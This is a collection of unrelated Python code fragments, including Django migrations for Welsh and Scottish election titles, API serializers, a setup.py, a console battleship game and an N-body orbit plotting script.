"naw.c.arfon.2016-05-05": "National Assembly for Wales elections (Constituencies) Arfon",
"naw.c.blaenau-gwent.2016-05-05": "National Assembly for Wales elections (Constituencies) Blaenau Gwent",
"naw.c.brecon-and-radnorshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Brecon and Radnorshire",
"naw.c.bridgend.2016-05-05": "National Assembly for Wales elections (Constituencies) Bridgend",
"naw.c.caerphilly.2016-05-05": "National Assembly for Wales elections (Constituencies) Caerphilly",
"naw.c.cardiff-central.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff Central",
"naw.c.cardiff-north.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff North",
"naw.c.cardiff-south-and-penarth.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff South and Penarth",
"naw.c.cardiff-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Cardiff West",
"naw.c.carmarthen-east-and-dinefwr.2016-05-05": "National Assembly for Wales elections (Constituencies) Carmarthen East and Dinefwr",
"naw.c.carmarthen-west-and-south-pembrokeshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Carmarthen West and South Pembrokeshire",
"naw.c.ceredigion.2016-05-05": "National Assembly for Wales elections (Constituencies) Ceredigion",
"naw.c.clwyd-south.2016-05-05": "National Assembly for Wales elections (Constituencies) Clwyd South",
"naw.c.clwyd-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Clwyd West",
"naw.c.cynon-valley.2016-05-05": "National Assembly for Wales elections (Constituencies) Cynon Valley",
"naw.c.delyn.2016-05-05": "National Assembly for Wales elections (Constituencies) Delyn",
"naw.c.dwyfor-meirionnydd.2016-05-05": "National Assembly for Wales elections (Constituencies) Dwyfor Meirionnydd",
"naw.c.gower.2016-05-05": "National Assembly for Wales elections (Constituencies) Gower",
"naw.c.islwyn.2016-05-05": "National Assembly for Wales elections (Constituencies) Islwyn",
"naw.c.llanelli.2016-05-05": "National Assembly for Wales elections (Constituencies) Llanelli",
"naw.c.merthyr-tydfil-and-rhymney.2016-05-05": "National Assembly for Wales elections (Constituencies) Merthyr Tydfil and Rhymney",
"naw.c.monmouth.2016-05-05": "National Assembly for Wales elections (Constituencies) Monmouth",
"naw.c.montgomeryshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Montgomeryshire",
"naw.c.neath.2016-05-05": "National Assembly for Wales elections (Constituencies) Neath",
"naw.c.newport-east.2016-05-05": "National Assembly for Wales elections (Constituencies) Newport East",
"naw.c.newport-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Newport West",
"naw.c.ogmore.2016-05-05": "National Assembly for Wales elections (Constituencies) Ogmore",
"naw.c.pontypridd.2016-05-05": "National Assembly for Wales elections (Constituencies) Pontypridd",
"naw.c.preseli-pembrokeshire.2016-05-05": "National Assembly for Wales elections (Constituencies) Preseli Pembrokeshire",
"naw.c.rhondda.2016-05-05": "National Assembly for Wales elections (Constituencies) Rhondda",
"naw.c.swansea-east.2016-05-05": "National Assembly for Wales elections (Constituencies) Swansea East",
"naw.c.swansea-west.2016-05-05": "National Assembly for Wales elections (Constituencies) Swansea West",
"naw.c.torfaen.2016-05-05": "National Assembly for Wales elections (Constituencies) Torfaen",
"naw.c.vale-of-clwyd.2016-05-05": "National Assembly for Wales elections (Constituencies) Vale of Clwyd",
"naw.c.vale-of-glamorgan.2016-05-05": "National Assembly for Wales elections (Constituencies) Vale of Glamorgan",
"naw.c.wrexham.2016-05-05": "National Assembly for Wales elections (Constituencies) Wrexham",
"naw.c.ynys-mon.2016-05-05": "National Assembly for Wales elections (Constituencies) Ynys Môn",
"naw.c.alyn-and-deeside.by.2018-02-06": "National Assembly for Wales election (Constituencies) Alyn and Deeside by-election",
"naw.r.mid-and-west-wales.2016-05-05": "National Assembly for Wales elections (Regions) Mid and West Wales",
"naw.r.north-wales.2016-05-05": "National Assembly for Wales elections (Regions) North Wales",
"naw.r.south-wales-central.2016-05-05": "National Assembly for Wales elections (Regions) South Wales Central",
"naw.r.south-wales-east.2016-05-05": "National Assembly for Wales elections (Regions) South Wales East",
"naw.r.south-wales-west.2016-05-05": "National Assembly for Wales elections (Regions) South Wales West",
"sp.c.aberdeen-central.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen Central",
"sp.c.aberdeen-donside.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen Donside",
"sp.c.aberdeenshire-east.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeenshire East",
"sp.c.aberdeenshire-west.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeenshire West",
"sp.c.aberdeen-south-and-north-kincardine.2016-05-05": "Scottish Parliament elections (Constituencies) Aberdeen South and North Kincardine",
"sp.c.airdrie-and-shotts.2016-05-05": "Scottish Parliament elections (Constituencies) Airdrie and Shotts",
"sp.c.almond-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Almond Valley",
"sp.c.angus-north-and-mearns.2016-05-05": "Scottish Parliament elections (Constituencies) Angus North and Mearns",
"sp.c.angus-south.2016-05-05": "Scottish Parliament elections (Constituencies) Angus South",
"sp.c.argyll-and-bute.2016-05-05": "Scottish Parliament elections (Constituencies) Argyll and Bute",
"sp.c.ayr.2016-05-05": "Scottish Parliament elections (Constituencies) Ayr",
"sp.c.banffshire-and-buchan-coast.2016-05-05": "Scottish Parliament elections (Constituencies) Banffshire and Buchan Coast",
"sp.c.caithness-sutherland-and-ross.2016-05-05": "Scottish Parliament elections (Constituencies) Caithness, Sutherland and Ross",
"sp.c.carrick-cumnock-and-doon-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Carrick, Cumnock and Doon Valley",
"sp.c.clackmannanshire-and-dunblane.2016-05-05": "Scottish Parliament elections (Constituencies) Clackmannanshire and Dunblane",
"sp.c.clydebank-and-milngavie.2016-05-05": "Scottish Parliament elections (Constituencies) Clydebank and Milngavie",
"sp.c.clydesdale.2016-05-05": "Scottish Parliament elections (Constituencies) Clydesdale",
"sp.c.coatbridge-and-chryston.2016-05-05": "Scottish Parliament elections (Constituencies) Coatbridge and Chryston",
"sp.c.cowdenbeath.2016-05-05": "Scottish Parliament elections (Constituencies) Cowdenbeath",
"sp.c.cumbernauld-and-kilsyth.2016-05-05": "Scottish Parliament elections (Constituencies) Cumbernauld and Kilsyth",
"sp.c.cunninghame-north.2016-05-05": "Scottish Parliament elections (Constituencies) Cunninghame North",
"sp.c.cunninghame-south.2016-05-05": "Scottish Parliament elections (Constituencies) Cunninghame South",
"sp.c.dumbarton.2016-05-05": "Scottish Parliament elections (Constituencies) Dumbarton",
"sp.c.dumfriesshire.2016-05-05": "Scottish Parliament elections (Constituencies) Dumfriesshire",
"sp.c.dundee-city-east.2016-05-05": "Scottish Parliament elections (Constituencies) Dundee City East",
"sp.c.dundee-city-west.2016-05-05": "Scottish Parliament elections (Constituencies) Dundee City West",
"sp.c.dunfermline.2016-05-05": "Scottish Parliament elections (Constituencies) Dunfermline",
"sp.c.east-kilbride.2016-05-05": "Scottish Parliament elections (Constituencies) East Kilbride",
"sp.c.east-lothian.2016-05-05": "Scottish Parliament elections (Constituencies) East Lothian",
"sp.c.eastwood.2016-05-05": "Scottish Parliament elections (Constituencies) Eastwood",
"sp.c.edinburgh-central.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Central",
"sp.c.edinburgh-eastern.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Eastern",
"sp.c.edinburgh-northern-and-leith.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Northern and Leith",
"sp.c.edinburgh-pentlands.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Pentlands",
"sp.c.edinburgh-southern.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Southern",
"sp.c.edinburgh-western.2016-05-05": "Scottish Parliament elections (Constituencies) Edinburgh Western",
"sp.c.ettrick-roxburgh-and-berwickshire.2016-05-05": "Scottish Parliament elections (Constituencies) Ettrick, Roxburgh and Berwickshire",
"sp.c.falkirk-east.2016-05-05": "Scottish Parliament elections (Constituencies) Falkirk East",
"sp.c.falkirk-west.2016-05-05": "Scottish Parliament elections (Constituencies) Falkirk West",
"sp.c.galloway-and-west-dumfries.2016-05-05": "Scottish Parliament elections (Constituencies) Galloway and West Dumfries",
"sp.c.glasgow-anniesland.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Anniesland",
"sp.c.glasgow-cathcart.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Cathcart",
"sp.c.glasgow-kelvin.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Kelvin",
"sp.c.glasgow-maryhill-and-springburn.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Maryhill and Springburn",
"sp.c.glasgow-pollok.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Pollok",
"sp.c.glasgow-provan.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Provan",
"sp.c.glasgow-shettleston.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Shettleston",
"sp.c.glasgow-southside.2016-05-05": "Scottish Parliament elections (Constituencies) Glasgow Southside",
"sp.c.greenock-and-inverclyde.2016-05-05": "Scottish Parliament elections (Constituencies) Greenock and Inverclyde",
"sp.c.hamilton-larkhall-and-stonehouse.2016-05-05": "Scottish Parliament elections (Constituencies) Hamilton, Larkhall and Stonehouse",
"sp.c.inverness-and-nairn.2016-05-05": "Scottish Parliament elections (Constituencies) Inverness and Nairn",
"sp.c.kilmarnock-and-irvine-valley.2016-05-05": "Scottish Parliament elections (Constituencies) Kilmarnock and Irvine Valley",
"sp.c.kirkcaldy.2016-05-05": "Scottish Parliament elections (Constituencies) Kirkcaldy",
"sp.c.linlithgow.2016-05-05": "Scottish Parliament elections (Constituencies) Linlithgow",
"sp.c.mid-fife-and-glenrothes.2016-05-05": "Scottish Parliament elections (Constituencies) Mid Fife and Glenrothes",
"sp.c.midlothian-north-and-musselburgh.2016-05-05": "Scottish Parliament elections (Constituencies) Midlothian North and Musselburgh",
"sp.c.midlothian-south-tweeddale-and-lauderdale.2016-05-05": "Scottish Parliament elections (Constituencies) Midlothian South, Tweeddale and Lauderdale",
"sp.c.moray.2016-05-05": "Scottish Parliament elections (Constituencies) Moray",
"sp.c.motherwell-and-wishaw.2016-05-05": "Scottish Parliament elections (Constituencies) Motherwell and Wishaw",
"sp.c.na-h-eileanan-an-iar.2016-05-05": "Scottish Parliament elections (Constituencies) Na h-Eileanan an Iar",
"sp.c.north-east-fife.2016-05-05": "Scottish Parliament elections (Constituencies) North East Fife",
"sp.c.orkney-islands.2016-05-05": "Scottish Parliament elections (Constituencies) Orkney Islands",
"sp.c.paisley.2016-05-05": "Scottish Parliament elections (Constituencies) Paisley",
"sp.c.perthshire-north.2016-05-05": "Scottish Parliament elections (Constituencies) Perthshire North",
"sp.c.perthshire-south-and-kinross-shire.2016-05-05": "Scottish Parliament elections (Constituencies) Perthshire South and Kinross-shire",
"sp.c.renfrewshire-north-and-west.2016-05-05": "Scottish Parliament elections (Constituencies) Renfrewshire North and West",
"sp.c.renfrewshire-south.2016-05-05": "Scottish Parliament elections (Constituencies) Renfrewshire South",
"sp.c.rutherglen.2016-05-05": "Scottish Parliament elections (Constituencies) Rutherglen",
"sp.c.shetland-islands.2016-05-05": "Scottish Parliament elections (Constituencies) Shetland Islands",
"sp.c.skye-lochaber-and-badenoch.2016-05-05": "Scottish Parliament elections (Constituencies) Skye, Lochaber and Badenoch",
"sp.c.stirling.2016-05-05": "Scottish Parliament elections (Constituencies) Stirling",
"sp.c.strathkelvin-and-bearsden.2016-05-05": "Scottish Parliament elections (Constituencies) Strathkelvin and Bearsden",
"sp.c.uddingston-and-bellshill.2016-05-05": "Scottish Parliament elections (Constituencies) Uddingston and Bellshill",
"sp.c.shetland-islands.by.2019-08-29": "Scottish Parliament elections (Constituencies) Shetland Islands by-election",
"sp.r.central-scotland.2016-05-05": "Scottish Parliament elections (Regions) Central Scotland",
"sp.r.glasgow.2016-05-05": "Scottish Parliament elections (Regions) Glasgow",
"sp.r.highlands-and-islands.2016-05-05": "Scottish Parliament elections (Regions) Highlands and Islands",
"sp.r.lothian.2016-05-05": "Scottish Parliament elections (Regions) Lothian",
"sp.r.mid-scotland-and-fife.2016-05-05": "Scottish Parliament elections (Regions) Mid Scotland and Fife",
"sp.r.north-east-scotland.2016-05-05": "Scottish Parliament elections (Regions) North East Scotland",
"sp.r.south-scotland.2016-05-05": "Scottish Parliament elections (Regions) South Scotland",
"sp.r.west-scotland.2016-05-05": "Scottish Parliament elections (Regions) West Scotland",
}
def fix_old_election_titles(apps, schema_editor):
    """Backfill `election_title` for the elections listed in election_title_map.

    Elections missing from the database are silently skipped so that this
    migration can run against an empty database (e.g. a fresh install).
    """
    # Loop-invariant: resolve the historical model once, not per iteration.
    Election = apps.get_model("elections", "Election")
    for election_id, title in election_title_map.items():
        try:
            e = Election.private_objects.get(election_id=election_id)
            e.election_title = title
            e.save()
        except Election.DoesNotExist:
            # don't throw an exception
            # if we're initializing an empty DB
            pass
class Migration(migrations.Migration):
    """Data migration: backfill titles for pre-existing elections."""
    dependencies = [
        ("elections", "0056_cleanup_group_types"),
    ]
    operations = [
        # Reverse operation is a no-op: the old (missing) titles need no restore.
        migrations.RunPython(fix_old_election_titles, migrations.RunPython.noop)
    ]
|
from typing import Optional

from pydantic import BaseModel
class UserCreateResponse(BaseModel):
    """Response schema for user creation: a code/msg envelope around token data."""
    # Optional[str] makes the annotation agree with the None default; pydantic v1
    # already treated `str = None` as implicitly optional, so behavior is unchanged.
    code: Optional[str] = None
    # data: dict = {"Oauth-Token": str, "expire": 86400*7}
    data: dict
    msg: Optional[str] = None
    class Config:
        # Allow constructing the model directly from ORM objects.
        orm_mode = True
class UserCurrentResponse(BaseModel):
    """Response schema for the current-user endpoint (code/msg envelope)."""
    # Optional[str] makes the annotation agree with the None default; pydantic v1
    # already treated `str = None` as implicitly optional, so behavior is unchanged.
    code: Optional[str] = None
    # data: dict = {"nickname": str, "avatar": '', "id": int, "username": str}
    data: dict
    msg: Optional[str] = None
|
from setuptools import setup
def readme():
    """Return the contents of README.md for use as the long description."""
    # Specify the encoding explicitly so the build does not depend on the
    # platform's locale default (README.md may contain non-ASCII characters).
    with open('README.md', encoding='utf-8') as f:
        return f.read()
# Package metadata for the `ryser` distribution (Latin squares and designs).
setup(
    name = 'ryser',
    version = '0.0.12',
    packages = ['ryser',],
    description = "Latin squares and related designs.",
    author = "Matthew Henderson",
    author_email = "matthew.james.henderson@gmail.com",
    url = "http://packages.python.org/ryser/",
    download_url = "http://pypi.python.org/pypi/ryser/",
    keywords = [""],
    classifiers = [
        "Programming Language :: Python",
        "Environment :: Other Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
        "Operating System :: OS Independent",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
    license = 'LICENSE.txt',
    long_description = readme(),  # README.md contents, shown on PyPI
    test_suite='nose.collector',
    tests_require=['nose'],
)
|
import sys
import time
import threading
import logging
from library.vpm import BinaryOut
logger = logging.getLogger(__name__)
class vdm(threading.Thread):
    """Virtual device manager thread: builds hardware handles from config.

    Only construction/setup is visible here; no run() override is defined in
    this excerpt, so starting the thread would run Thread's default run().
    """
    def __init__(self, config,callback):
        threading.Thread.__init__(self)
        self._config = config      # mapping: device name -> settings dict (has a 'MODE' entry)
        self._callback = callback  # event callback; not used in this excerpt
        self._hwHandle = {}        # device name -> driver instance
    def setup(self):
        # Instantiate and initialize one driver per configured device.
        for key, item in self._config.items():
            if 'BINARY-OUT' in item.get('MODE'):
                self._hwHandle[key] = BinaryOut(item)
                self._hwHandle.get(key).setup()
            # NOTE(review): the BINARY-IN branch also constructs BinaryOut and no
            # BinaryIn class is imported — looks like a copy-paste bug; confirm.
            if 'BINARY-IN'in item.get('MODE'):
                self._hwHandle[key] = BinaryOut(item)
                self._hwHandle.get(key).setup()
|
# Compute the n-th term of the recurrence a(k) = a(k-1) + a(k-2)
# seeded with a(0) = 2, a(1) = 1, where n is read from stdin.
# For n < 2 the printed answer is 1.
prev, curr = 2, 1
result = 1
for _ in range(2, int(input()) + 1):
    result = curr + prev
    prev, curr = curr, result
print(result)
from rest_framework import serializers
from . import models
class ChoiceSerializer(serializers.ModelSerializer):
    """Serializes a poll Choice: its id and display text."""
    class Meta:
        model = models.Choice
        fields = ('id', 'description', )
class PollSerializer(serializers.ModelSerializer):
    """Serializes a Poll together with its nested, read-only choices."""
    choices = ChoiceSerializer(many=True, read_only=True)
    class Meta:
        model = models.Poll
        fields = ('id', 'title', 'date', 'vote_count', 'choices',)
class VoteSerializer(serializers.ModelSerializer):
    """Serializes a Vote: the chosen option, its poll, and when it was cast."""
    class Meta:
        model = models.Vote
        fields = ('choice', 'poll', 'date',)
class VoteResultSerializer(serializers.Serializer):
    """Plain (non-model) serializer for aggregated vote totals per choice."""
    id = serializers.IntegerField()
    description = serializers.CharField(max_length=255)
    total = serializers.IntegerField()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-05-21 07:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Relax FKs to SET_NULL and update Persian verbose names on edu models."""
    dependencies = [
        ('edu', '0009_auto_20190519_2222'),
    ]
    operations = [
        migrations.AlterField(
            model_name='register',
            name='classroom',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='registers', to='edu.Classroom', verbose_name='کلاس'),
        ),
        migrations.AlterField(
            model_name='register',
            name='is_active',
            field=models.BooleanField(verbose_name='فعال'),
        ),
        migrations.AlterField(
            model_name='register',
            name='student',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='registers', to='edu.Student', verbose_name='دانش آموز'),
        ),
        migrations.AlterField(
            model_name='teacherclasscourse',
            name='class_time',
            field=models.CharField(max_length=100, verbose_name='زمان کلاس'),
        ),
        migrations.AlterField(
            model_name='teacherclasscourse',
            name='classroom',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Classroom', verbose_name='کلاس'),
        ),
        # NOTE(review): verbose_name 'دزس' below looks like a typo for 'درس'
        # ("course") — if so, fix it in a follow-up migration, not here.
        migrations.AlterField(
            model_name='teacherclasscourse',
            name='course',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Course', verbose_name='دزس'),
        ),
        migrations.AlterField(
            model_name='teacherclasscourse',
            name='teacher',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teacher_class_courses', to='edu.Teacher', verbose_name='معلم'),
        ),
    ]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 8 17:44:53 2019
@author: Zackerman24
"""
"""For checking correct coord entry, could make sure entry is in
A - F and 1-6"""
"""Shave off extra space on any user input"""
"""Make sure coordinate entries are unique, not duplicative"""
import numpy as np
def create_battleship(game_array, player_array, player_placements):
    """Creates a user's 4-coordinate long battleship.

    Prompts until exactly four space-separated coordinates are entered (typing
    "exit" quits), records the original cell labels in player_placements so
    hits can be recognized later, and marks the chosen cells with 'BS'.
    """
    coordinates = input(("\nEnter four adjacent coordinates for your Battleship"
                         ", separated by a space: "))
    split_coord = coordinates.split()
    while True:
        if coordinates.upper() == "EXIT":
            exit()
        elif len(split_coord) != 4:
            print("Invalid coordinate entry. Please try again.")
            # BUG FIX: the re-prompt previously read "coordinatesfor your" —
            # the implicit string concatenation was missing a space.
            coordinates = input(("\nEnter four adjacent coordinates"
                                 " for your Battleship"
                                 ", separated only by a space: "))
            split_coord = coordinates.split()
            continue
        else:
            break
    placements = []
    for coord in split_coord:
        # np.where yields parallel row/col index arrays; pair them up.
        raw_spot = np.where(game_array == coord)
        spot = list(zip(raw_spot[0], raw_spot[1]))
        placements.append(spot)
    for place in placements:
        place_1 = place[0]
        # Save the original label before overwriting the cell with the ship code.
        player_placements.append(player_array[place_1[0], place_1[1]])
        player_array[place_1[0], place_1[1]] = 'BS'
    print(player_array)
def create_cruiser(game_array, player_array, player_placements):
    """Creates a user's 3-coordinate long cruiser.

    Prompts until exactly three space-separated coordinates are entered (typing
    "exit" quits), records the original cell labels in player_placements so
    hits can be recognized later, and marks the chosen cells with 'CR'.
    """
    coordinates = input(("\nEnter three adjacent coordinates for your Cruiser"
                         ", separated by a space: "))
    split_coord = coordinates.split()
    while True:
        if coordinates.upper() == "EXIT":
            exit()
        elif len(split_coord) != 3:
            print("Invalid coordinate entry. Please try again.")
            # BUG FIX: the re-prompt previously read "coordinatesfor your" —
            # the implicit string concatenation was missing a space.
            coordinates = input(("\nEnter three adjacent coordinates"
                                 " for your Cruiser"
                                 ", separated only by a space: "))
            split_coord = coordinates.split()
            continue
        else:
            break
    placements = []
    for coord in split_coord:
        # np.where yields parallel row/col index arrays; pair them up.
        raw_spot = np.where(game_array == coord)
        spot = list(zip(raw_spot[0], raw_spot[1]))
        placements.append(spot)
    for place in placements:
        place_1 = place[0]
        # Save the original label before overwriting the cell with the ship code.
        player_placements.append(player_array[place_1[0], place_1[1]])
        player_array[place_1[0], place_1[1]] = 'CR'
    print(player_array)
def create_destroyer(game_array, player_array, player_placements):
    """Creates a user's 2-coordinate long destroyer.

    Prompts until exactly two space-separated coordinates are entered (typing
    "exit" quits), records the original cell labels in player_placements so
    hits can be recognized later, and marks the chosen cells with 'DT'.
    """
    coordinates = input(("\nEnter two adjacent coordinates for your Destroyer"
                         ", separated by a space: "))
    split_coord = coordinates.split()
    while True:
        if coordinates.upper() == "EXIT":
            exit()
        elif len(split_coord) != 2:
            print("\nInvalid coordinate entry. Please try again.")
            # BUG FIX: the re-prompt previously read "coordinatesfor your" —
            # the implicit string concatenation was missing a space.
            coordinates = input(("\nEnter two adjacent coordinates"
                                 " for your Destroyer"
                                 ", separated only by a space: "))
            split_coord = coordinates.split()
            continue
        else:
            break
    placements = []
    for coord in split_coord:
        # np.where yields parallel row/col index arrays; pair them up.
        raw_spot = np.where(game_array == coord)
        spot = list(zip(raw_spot[0], raw_spot[1]))
        placements.append(spot)
    for place in placements:
        place_1 = place[0]
        # Save the original label before overwriting the cell with the ship code.
        player_placements.append(player_array[place_1[0], place_1[1]])
        player_array[place_1[0], place_1[1]] = 'DT'
    print(player_array)
def create_ships(game_array, player_array, player_placements):
    """Place all three of a player's ships: battleship, cruiser, then destroyer."""
    # Order matters for the user prompts, so iterate the placers in sequence.
    for place_ship in (create_battleship, create_cruiser, create_destroyer):
        place_ship(game_array, player_array, player_placements)
def player_move(game_array, opponent_array, opponent_placements):
    """Allows a player to enter an attack coordinate."""
    attack = input("\nEnter the coordinate you'd like to attack:")
    if attack.upper() == "EXIT":
        exit()
    # opponent_placements holds the original labels of cells that hold ships,
    # so membership here means the attack struck a ship cell.
    if attack in opponent_placements:
        raw_spot = np.where(game_array == attack)
        spot = list(zip(raw_spot[0],raw_spot[1]))
        attack_coordinate = spot[0]
        # Report which ship type occupies the struck cell on the opponent grid.
        if opponent_array[attack_coordinate[0],attack_coordinate[1]] == "BS":
            print("\nSuccess! You've hit your opponent's battleship.")
        elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == "CR":
            print("\nSuccess! You've hit your opponent's cruiser.")
        elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == "DT":
            print("\nSuccess! You've hit your opponent's destroyer.")
        else:
            print("We're not sure what you hit!")
        # Consume the struck cell; an empty list means every ship cell is gone.
        opponent_placements.remove(attack)
        if not opponent_placements:
            print("\nCongratulations! You destroyed all your opponent's ships.")
            print("The game will now shutdown.")
            exit()
        else:
            print("Your opponent only has " + str(len(opponent_placements)) + " spots left.")
    else:
        print("Oops! Your attack did not strike any ships.")
import sys
sys.path.append('C:\\Users\\nikit\\AppData\\Local\\Programs\\Python\\python38\\lib\\site-packages')
import NBodyPlotter as nbp
from NBodyPlotter import NBodySolver
from NBodyPlotter import Body
import matplotlib.pyplot as plt
import numpy as np
#Define scale values to keep close to unity
mass_scale = 1e30 #Kg
dist_scale = 1e11 #m
vel_scal = 1000 #m/s (such that inputted units are in Km/s)
# NOTE(review): 356 days looks like a typo for 365 (one year) — confirm intent.
orbit_period = 356*24*60*60 #s
solver = NBodySolver()
solver.SetSolverRelativeValues(mass_scale, dist_scale, vel_scal, orbit_period)
# Speed given to each star (in the scaled km/s units used by the solver).
star_vel = np.sqrt(nbp.G *mass_scale/(dist_scale))/(vel_scal*2)
def Reset(solver):
    """Clear the solver and re-add the two-star + small-body 'halo' system."""
    solver.bodies.clear()
    solver.AddBody(Body("star 1", 1, [0, -1, 0], [star_vel,0,0]))
    solver.AddBody(Body("star 2", 1, [0, 1, 0], [-star_vel,0,0]))
    solver.AddBody(Body("mid boi", 0.1, [0, 0, 1], [0,0,0]))
Reset(solver)
t = 10
time_span=np.linspace(0,t,t*10000)
#rBodyDist = 1e30
#solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
# NOTE(review): the result of this solve is never plotted (the plot calls just
# below are commented out) — presumably dead work; confirm before removing.
solver.SolveNBodyProblem(time_span)
#fig = plt.figure()
#ax =fig.add_subplot(111, projection='3d')
#solver.PlotNBodySolution(ax, legend=False)
# Two side-by-side 3D axes for comparing different rogue-body distances.
fig = plt.figure(figsize=(13, 8))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122, projection='3d')
#ax4 = fig.add_subplot(144, projection='3d')
#star_vel = np.sqrt(nbp.G *mass_scale/(5*dist_scale))/(vel_scal*2)
t = 10
time_span=np.linspace(0,t,t*10000)
#Initiate solver
solver.SetSolverRelativeValues(mass_scale, dist_scale, vel_scal, orbit_period)
# print(star_vel)
# def Reset(solver):
# solver.bodies.clear()
# solver.AddBody(Body("star 1", 1, [0, -5, 0], [star_vel,0,0]))
# solver.AddBody(Body("star 2", 1, [0, 5, 0], [-star_vel,0,0]))
# solver.AddBody(Body("mid boi", 0.1, [0, 0, 1], [0,0,0]))
# Reset(solver)
# solver.SolveNBodyProblem(time_span)
# #solver.AnimateNBodySolution()
# solver.PlotNBodySolution(ax=ax1, show=False, legend=False)
# ax1.set_title("Halo system")
#
# Reset(solver)
#
#
#
# Solve and plot the halo system with a rogue body at 1e45 (left axes).
Reset(solver)
rBodyDist = 1e45
solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
solver.SolveNBodyProblem(time_span)
solver.PlotNBodySolution(ax=ax1, show=False, legend=False)
ax1.set_title("Halo system\n"+r"rogue body at $R_{rs}=$" + str(rBodyDist))
# Repeat with the rogue body ten times closer (1e44) on the right axes.
Reset(solver)
rBodyDist = 1e44
solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
solver.SolveNBodyProblem(time_span)
solver.PlotNBodySolution(ax=ax2, show=False, legend=True)
ax2.set_title("Halo system\n rogue body at\n"+r"$R_{rs}=$" + str(rBodyDist))
fig.subplots_adjust(wspace=0.15)
# Reset(solver)
#
# t = 500
# time_span=np.linspace(0,t,t*10000)
#
# rBodyDist = 4.5e45
# solver.AddBody(nbp.CreateRogueBody(solver.bodies, rBodyDist, mass_scale, dist_scale, vel_scal))
# solver.SolveNBodyProblem(time_span)
# solver.PlotNBodySolution(ax=ax4, show=False, legend=False)
# ax4.set_title("halo system\n"+r"rogue body at $R_{rs}=$" + str(rBodyDist))
# Render both subplots.
plt.show()
|
from src.entity.article import Article
from src.configure import environment, runTime
import json
def orgnizeJson2ArticleList(jsonStrs):
    """Decode a UTF-8 JSON byte string into a list of Article objects.

    Each JSON object may carry 'title' and 'content' keys; missing keys
    default to the empty string.
    """
    records = json.loads(jsonStrs.decode('utf8'))
    articles = []
    for record in records:
        item = Article()
        item.title = record.get('title', '')
        item.content = record.get('content', '')
        articles.append(item)
    return articles
def orgnizeArticleList2Json(articleList):
    """Serialize each article's per-task results into a list of plain dicts.

    For every task listed on an article, look up the attribute holding that
    task's result (via runTime.TASK_ARTICLE_ATTR_MAP) and emit {task: value}.
    One dict is produced per article, empty if the article has no tasks.
    """
    return [
        {task: getattr(article, runTime.TASK_ARTICLE_ATTR_MAP[task])
         for task in article.taskList}
        for article in articleList
    ]
|
#!/usr/bin/python3
class Edureka:
    '''Explaining Edureka Class'''
    # Bug fix: the docstring must be the FIRST statement of the class body.
    # It previously followed empcount, so it was a discarded expression and
    # Edureka.__doc__ was None.
    empcount = 0
# Demonstrate the class metadata (runs at import time).
print("Edureka. __dict__:", Edureka.__dict__)
# Bug fix: this line prints __name__, so label it correctly (was "__dict__").
print("Edureka. __name__:", Edureka.__name__)
|
# This is where the answers to Chapter 9 questions for the BSS Dev RampUp go
# Name: |
import re
from django.db import models
import bcrypt
# Create your models here.
class Dog(models.Model):
    """A dog profile with a many-to-many relation to its tricks."""
    name = models.CharField(max_length=10)
    is_good = models.BooleanField(default=True)
    img_url = models.CharField(max_length=255)
    bio = models.TextField()
    breed = models.CharField(max_length=15)
    # Reverse accessor on Trick is 'dogs'.
    tricks = models.ManyToManyField('Trick', related_name='dogs')
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
class Trick(models.Model):
    """A trick; related dogs are reachable via the 'dogs' reverse accessor."""
    name = models.CharField(max_length=10)
    # dogs
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
class UserManager(models.Manager):
    """Custom manager supplying registration and login validation for User."""

    def new_user_validator(self, post_data):
        """Validate registration POST data; return a dict of field errors.

        Expects keys: 'name', 'esnales' (the email field), 'password',
